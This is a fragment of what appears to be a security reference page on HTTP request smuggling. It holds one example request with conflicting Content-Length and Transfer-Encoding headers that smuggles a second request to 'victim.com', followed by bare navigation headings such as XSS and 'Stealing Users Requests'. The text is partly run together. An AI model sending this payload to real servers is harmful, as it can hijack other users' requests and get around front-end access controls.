HTTP Request Smuggling
POST / HTTP/1.1
Host: victim.com
Content-Length: 67
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
Z
0
GET /smuggled HTTP/1.1
Host: victim.com
X: XOpen Redirect

XSS

Bypassing front-end controls

Stealing Users Requests

Content-Length Size
Burp Extension
Tools
Resources
Interesting Books
Interesting BooksSupport this Gitbook
Last updated

